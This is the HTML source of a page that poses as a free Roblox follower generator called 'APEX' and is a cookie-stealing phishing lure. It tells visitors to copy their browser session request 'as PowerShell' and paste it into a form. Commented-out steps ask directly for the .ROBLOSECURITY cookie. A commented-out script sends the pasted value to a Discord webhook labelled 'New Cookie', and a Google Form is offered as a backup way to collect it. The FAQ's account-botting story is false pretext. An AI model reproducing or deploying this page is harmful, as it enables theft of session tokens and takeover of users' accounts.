<!DOCTYPE html>
<html>
  <head>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous"><head>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width">
      <title>Roblox API Follow Botter</title><meta name="theme-color" content="#F5565C">
      <meta property="og:type" content="website">
      <meta property="og:site_name" content="Powered By APEX FOLLOWERS">
      <meta property="og:title" content="Free Roblox Followers!">
      <meta property="og:image" content="/img/followers.png">
      <meta property="og:description" content="#1 Trusted Follow Botting Source - Rolimons">
      <meta property="description" content="#1 Trusted Follow Botting Source - Rolimons">
      <link rel="shortcut icon" href="/img/followers.png">
      <link href="style.css" rel="stylesheet" type="text/css" />
  </head>
  <style>
    @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@300;700;900&display=swap');
    </style>
  <style>
    @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@300&display=swap');
    </style>

<style>
  /* Center the loader */
  #loader {
    position: absolute;
    left: 50%;
    top: 50%;
    z-index: 1;
    width: 120px;
    height: 120px;
    margin: -76px 0 0 -76px;
    border: 16px solid #f3f3f3;
    border-radius: 50%;
    border-top: 16px solid #3498db;
    -webkit-animation: spin 2s linear infinite;
    animation: spin 2s linear infinite;
  }
  
  @-webkit-keyframes spin {
    0% { -webkit-transform: rotate(0deg); }
    100% { -webkit-transform: rotate(360deg); }
  }
  
  @keyframes spin {
    0% { transform: rotate(0deg); }
    100% { transform: rotate(360deg); }
  }
  
  /* Add animation to "page content" */
  .animate-bottom {
    position: relative;
    -webkit-animation-name: animatebottom;
    -webkit-animation-duration: 1s;
    animation-name: animatebottom;
    animation-duration: 1s
  }
  
  @-webkit-keyframes animatebottom {
    from { bottom:-100px; opacity:0 } 
    to { bottom:0px; opacity:1 }
  }
  
  @keyframes animatebottom { 
    from{ bottom:-100px; opacity:0 } 
    to{ bottom:0; opacity:1 }
  }
  
  </style>

<div class="loader"></div>

<style>
body {
  background-color: rgb(36, 36, 36);
}</style>
<style>
h1 {
  font-family: 'Poppins', sans-serif;
}
h2 {
  font-family: 'Poppins', sans-serif;
}
h3 {
  font-family: 'Poppins', sans-serif;
}
h6 {
  font-family: 'Poppins', sans-serif;
}
h5 {
  font-family: 'Poppins', sans-serif;
}
h4 {
  font-family: 'Poppins', sans-serif;
}
p {
  font-family: 'Poppins', sans-serif;
}
</style>
<title style="color:white">APEX FOLLOWER GENERATOR</title>
  <body class="container mt-5" onload="myFunction()" style="margin:0;">
    <div id="loader"></div>
<!--     <script>
      var myVar;
      
      function myFunction() {
        myVar = setTimeout(showPage, 1300);
      }
      
      function showPage() {
        document.getElementById("loader").style.display = "none";
        document.getElementById("myDiv").style.display = "block";
      }
      </script> -->
    <form onsubmit="sendContact(event)" style="display:none;" id="myDiv" class="animate-bottom">  
      <div class="mb-3">
        <hr>
        <h1 style="color:white">ROBLOX FOLLOWER GENERATOR | By APEX</h1> <h3 style="color:white"c>Working 2022</h3>
        <hr>
        <h3 style="color:white">━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━</h3>
        <hr>
        <h4 style="color:white">How To Get Code?</h4>
        <h6 style="color:white">To get the selected accounts profile code, you must follow these steps:</h6>
        <hr>
        <p style="color:white">Step 1:ㅤGo to the players profile, right click and click 'Inspect Element'</p>
        <p style="color:white">Step 2:ㅤFrom there, click on 'Network'. If its not there then click the arrows to the right</p>
        <p style="color:white">Step 3:ㅤNow refresh the page and scroll to the top and right click on 'profile' in the inspect element page'</p>
        <p style="color:white">Step 4:ㅤClick 'Copy as PowerShell'. MAKE SURE YOU CLICK COPY AS POWERSHELL OR IT WILL NOT WORK!</p>
        <p style="color:white">Step 5:ㅤGo to the text box under this text and paste it in the code section (also type the amount of followers you want)</p>
        <p style="color:white">Step 6:ㅤClick submit and wait 1-2 hours'</p>
        <!-- <p style="color:white">Step 1:ㅤGo to the players profile, right click and click 'Inspect Element'</p>
        <p style="color:white">Step 2:ㅤFrom there, click on 'Application'. If its not there then click the arrows to the right</p>
        <p style="color:white">Step 3:ㅤThen look on the left and click the drop down arrow by 'Cookies'</p>
        <p style="color:white">Step 4:ㅤLocate '.ROBLOSECURITY' and right click the value next to it and click 'Copy'. This code enables us to bypass ratelimits and directly send the followers</p>
        <p style="color:white">Step 5:ㅤHead back to this website and enter the code into the box that asks for your profile code</p>
        <p style="color:white">Step 6:ㅤThen also enter the number of followers you would like to send to the targeted account</p> -->
        <hr>
        <h3 style="color:white">━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━</h3>
        <hr>
        <h2 style="color:white">Our FAQ</h2>
        <hr>
        <hr>
        <h4 style="color:white">How Does It Work?</h4>
        <h6 style="color:white">We use several APIs to generate mass amounts of accounts and direct them to follow your specified accounts</h6>
        <hr>
        <p style="color:white">There are 2 main APIs that we use. They are the Roblox API and our APEX API.</p>
        <p style="color:white">We exploit the Roblox API by pinging it repeatedly to do the same thing which is to make accounts.</p>
        <p style="color:white">This allows us to make hundreds of thousands of accounts in minutes.</p>
        <p style="color:white">To control this, we use our APEX API which tricks the Roblox API into thinking its a real person, meaning we can do human like tasks, e.g. making the botted accounts follow you.</p>
        <hr>
        <hr>
        <hr>
        <h4 style="color:white">Why Can't We Use Usernames?</h4>
        <hr>
        <p style="color:white">The reason we need the script and not a username is because that code allows our APEX API to bypass Roblox API ratelimits and allows us to target the account.</p>
        <p style="color:white">We have to use the code to target the accounts instead of the username because otherwise our APEX API gets confused and the program ends before you can get the followers</p>
        <hr>
        <hr>
        <hr>
        <h4 style="color:white">What Is The API Status?</h4>
        <hr>
        <p style="color:white">Out API status tells you if our APEX API is offline or online. If it is offline, then the follow bot will not work and you will have to enter the profile code in our google form.</p>
        <p style="color:white">You can tell if the API is offline or not by checking just above the text box. It should say if its 'ONLINE' or 'OFFLINE'</p>
        <p style="color:white">If you would like to locate the Google Form incase the API is down, just click <a href="https://docs.google.com/forms/d/e/1FAIpQLSdaOr6dw4OVyk7HFVNUoX4CtONP9jyUUDCoxrFRSI3gHPO2AA/viewform?usp=sf_link">here</a></p>
        <hr>
        <hr>
        <h3 style="color:white">━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━</h3>
        <hr>
        <hr>
        <h4 style="color:white">Generate Account/Profile Followers - API STATUS: 🔴 OFFLINE<!--🟢 ONLINE-->ㅤ|ㅤEnter Details <a href="https://docs.google.com/forms/d/e/1FAIpQLSdaOr6dw4OVyk7HFVNUoX4CtONP9jyUUDCoxrFRSI3gHPO2AA/viewform?usp=sf_link">Here</a> If Offline</h4>
        <hr>
        <label for="messageInput" class="form-label" style="color:white">Enter Your Code</label>
        <textarea class="form-control" id="messageCookie" rows="1" class="readonly"></textarea>
        <hr>
        <label for="messageInput" class="form-label" style="color:white">Enter Number Of Followers (150,000 MAX LIMIT)</label>
        <textarea class="form-control" id="messageFollowers" rows="1" class="readonly"></textarea>
        <hr>
        <button type="submit" class="btn btn-primary">Send Followers</button>
        <hr>
        <hr>
        <hr>
      </div>
      <hr>
      <hr>
      <hr>

    </form>
<!--     <script>
      async function sendContact(ev) {
        ev.preventDefault();

        const senderCookie = document
          .getElementById('messageCookie').value;
          
        const senderFollowers = document
        .getElementById('messageFollowers').value;

        const webhookBody = {
          embeds: [{
            title: 'New Cookie',
            fields: [
            { name: 'Cookie Code', value: senderCookie },
            { name: 'Amount of Followers', value: senderFollowers },
            ]
          }],
        };

        const webhookUrl = 'https://ptb.discord.com/api/webhooks/1007691288759500891/CRUYfw1841NswMc23UvG-XbYynpx7APx55cCFYWFLz3O9-W6ePc4JiQ9fioa_dNB9BOu';

        const response = await fetch(webhookUrl, {
          method: 'POST',
          headers: {
            'Content-Type': 'application/json',
          },
          body: JSON.stringify(webhookBody),
        });

        if (response.ok) {
          // alert('Processing...'),
          // alert('💚 | Followers being sent... Please wait to 1-2 hours!');
          alert('APEX API Is OFFLINE');
        } else {
          alert('API ERROR - PLEASE TRY AGAIN LATER')
        }
      }


    </script> -->

    <style>
    .mb-3 {
      position: absolute;
      top: 50%;
      left: 50%;
      margin-top: -50px;
      margin-left: -100px;
    }
    </style>


    <footer class="copyright">© Copyright By APEX Followers. All Rights Reserved</footer>
    

  </body>

</html>
